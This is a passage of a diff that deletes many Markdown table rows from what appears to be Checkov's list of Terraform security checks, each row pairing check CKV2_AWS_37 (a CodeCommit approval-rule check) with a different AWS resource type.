-| 1151 | CKV2_AWS_37              | resource                         | aws_guardduty_organization_configuration                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1152 | CKV2_AWS_37              | resource                         | aws_guardduty_threatintelset                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1153 | CKV2_AWS_37              | resource                         | aws_iam_access_key                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1154 | CKV2_AWS_37              | resource                         | aws_iam_account_alias                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1155 | CKV2_AWS_37              | resource                         | aws_iam_account_password_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1156 | CKV2_AWS_37              | resource                         | aws_iam_group                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1157 | CKV2_AWS_37              | resource                         | aws_iam_group_membership                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1158 | CKV2_AWS_37              | resource                         | aws_iam_group_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1159 | CKV2_AWS_37              | resource                         | aws_iam_group_policy_attachment                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1160 | CKV2_AWS_37              | resource                         | aws_iam_instance_profile                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1161 | CKV2_AWS_37              | resource                         | aws_iam_openid_connect_provider                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1162 | CKV2_AWS_37              | resource                         | aws_iam_policy                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1163 | CKV2_AWS_37              | resource                         | aws_iam_policy_attachment                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1164 | CKV2_AWS_37              | resource                         | aws_iam_policy_document                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1165 | CKV2_AWS_37              | resource                         | aws_iam_role                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1166 | CKV2_AWS_37              | resource                         | aws_iam_role_policy                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1167 | CKV2_AWS_37              | resource                         | aws_iam_role_policy_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1168 | CKV2_AWS_37              | resource                         | aws_iam_saml_provider                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1169 | CKV2_AWS_37              | resource                         | aws_iam_server_certificate                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1170 | CKV2_AWS_37              | resource                         | aws_iam_service_linked_role                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1171 | CKV2_AWS_37              | resource                         | aws_iam_user                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1172 | CKV2_AWS_37              | resource                         | aws_iam_user_group_membership                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1173 | CKV2_AWS_37              | resource                         | aws_iam_user_login_profile                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1174 | CKV2_AWS_37              | resource                         | aws_iam_user_policy                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1175 | CKV2_AWS_37              | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1176 | CKV2_AWS_37              | resource                         | aws_iam_user_ssh_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1177 | CKV2_AWS_37              | resource                         | aws_inspector_assessment_target                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1178 | CKV2_AWS_37              | resource                         | aws_inspector_assessment_template                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1179 | CKV2_AWS_37              | resource                         | aws_inspector_resource_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1180 | CKV2_AWS_37              | resource                         | aws_instance                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1181 | CKV2_AWS_37              | resource                         | aws_internet_gateway                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1182 | CKV2_AWS_37              | resource                         | aws_iot_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1183 | CKV2_AWS_37              | resource                         | aws_iot_policy                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1184 | CKV2_AWS_37              | resource                         | aws_iot_policy_attachment                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1185 | CKV2_AWS_37              | resource                         | aws_iot_role_alias                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1186 | CKV2_AWS_37              | resource                         | aws_iot_thing                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1187 | CKV2_AWS_37              | resource                         | aws_iot_thing_principal_attachment                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1188 | CKV2_AWS_37              | resource                         | aws_iot_thing_type                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1189 | CKV2_AWS_37              | resource                         | aws_iot_topic_rule                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1190 | CKV2_AWS_37              | resource                         | aws_key_pair                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1191 | CKV2_AWS_37              | resource                         | aws_kinesis_analytics_application                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1192 | CKV2_AWS_37              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1193 | CKV2_AWS_37              | resource                         | aws_kinesis_stream                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1194 | CKV2_AWS_37              | resource                         | aws_kinesis_video_stream                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1195 | CKV2_AWS_37              | resource                         | aws_kms_alias                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1196 | CKV2_AWS_37              | resource                         | aws_kms_ciphertext                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1197 | CKV2_AWS_37              | resource                         | aws_kms_external_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1198 | CKV2_AWS_37              | resource                         | aws_kms_grant                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1199 | CKV2_AWS_37              | resource                         | aws_kms_key                                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1200 | CKV2_AWS_37              | resource                         | aws_lambda_alias                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1201 | CKV2_AWS_37              | resource                         | aws_lambda_event_source_mapping                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1202 | CKV2_AWS_37              | resource                         | aws_lambda_function                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1203 | CKV2_AWS_37              | resource                         | aws_lambda_function_event_invoke_config                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1204 | CKV2_AWS_37              | resource                         | aws_lambda_layer_version                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1205 | CKV2_AWS_37              | resource                         | aws_lambda_permission                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1206 | CKV2_AWS_37              | resource                         | aws_lambda_provisioned_concurrency_config                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1207 | CKV2_AWS_37              | resource                         | aws_launch_configuration                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1208 | CKV2_AWS_37              | resource                         | aws_launch_template                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1209 | CKV2_AWS_37              | resource                         | aws_lb                                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1210 | CKV2_AWS_37              | resource                         | aws_lb_cookie_stickiness_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1211 | CKV2_AWS_37              | resource                         | aws_lb_listener                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1212 | CKV2_AWS_37              | resource                         | aws_lb_listener_certificate                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1213 | CKV2_AWS_37              | resource                         | aws_lb_listener_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1214 | CKV2_AWS_37              | resource                         | aws_lb_ssl_negotiation_policy                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1215 | CKV2_AWS_37              | resource                         | aws_lb_target_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1216 | CKV2_AWS_37              | resource                         | aws_lb_target_group_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1217 | CKV2_AWS_37              | resource                         | aws_licensemanager_association                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1218 | CKV2_AWS_37              | resource                         | aws_licensemanager_license_configuration                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1219 | CKV2_AWS_37              | resource                         | aws_lightsail_domain                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1220 | CKV2_AWS_37              | resource                         | aws_lightsail_instance                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1221 | CKV2_AWS_37              | resource                         | aws_lightsail_key_pair                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1222 | CKV2_AWS_37              | resource                         | aws_lightsail_static_ip                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1223 | CKV2_AWS_37              | resource                         | aws_lightsail_static_ip_attachment                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1224 | CKV2_AWS_37              | resource                         | aws_load_balancer_backend_server_policy                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1225 | CKV2_AWS_37              | resource                         | aws_load_balancer_listener_policy                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1226 | CKV2_AWS_37              | resource                         | aws_load_balancer_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1227 | CKV2_AWS_37              | resource                         | aws_macie_member_account_association                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1228 | CKV2_AWS_37              | resource                         | aws_macie_s3_bucket_association                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1229 | CKV2_AWS_37              | resource                         | aws_main_route_table_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1230 | CKV2_AWS_37              | resource                         | aws_media_convert_queue                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1231 | CKV2_AWS_37              | resource                         | aws_media_package_channel                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1232 | CKV2_AWS_37              | resource                         | aws_media_store_container                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1233 | CKV2_AWS_37              | resource                         | aws_media_store_container_policy                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1234 | CKV2_AWS_37              | resource                         | aws_mq_broker                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1235 | CKV2_AWS_37              | resource                         | aws_mq_configuration                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1236 | CKV2_AWS_37              | resource                         | aws_msk_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1237 | CKV2_AWS_37              | resource                         | aws_msk_configuration                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1238 | CKV2_AWS_37              | resource                         | aws_nat_gateway                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1239 | CKV2_AWS_37              | resource                         | aws_neptune_cluster                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1240 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
